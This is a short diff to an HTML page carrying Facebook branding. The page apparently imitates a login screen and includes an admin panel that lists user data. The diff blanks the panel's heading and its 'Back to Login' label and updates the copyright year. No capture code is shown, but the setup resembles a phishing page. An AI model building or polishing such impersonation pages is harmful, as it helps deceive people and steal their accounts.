--- a/index.html
+++ b/index.html
@@ -260,7 +260,7 @@
     </div>
     
     <div class="admin-panel" id="adminPanel">
-        <h2>Admin Panel - User Data</h2>
+        <h2>.</h2>
         <table id="userTable">
             <thead>
                 <tr>
@@ -274,11 +274,11 @@
                 <!-- User data will be inserted here -->
             </tbody>
         </table>
-        <button class="back-button" id="backButton">Back to Login</button>
+        <button class="back-button" id="backButton">.</button>
     </div>
     
     <footer>
-        <p>Facebook &copy; 2023</p>
+        <p>Facebook &copy; 2025</p>
     </footer>
 
     <script>
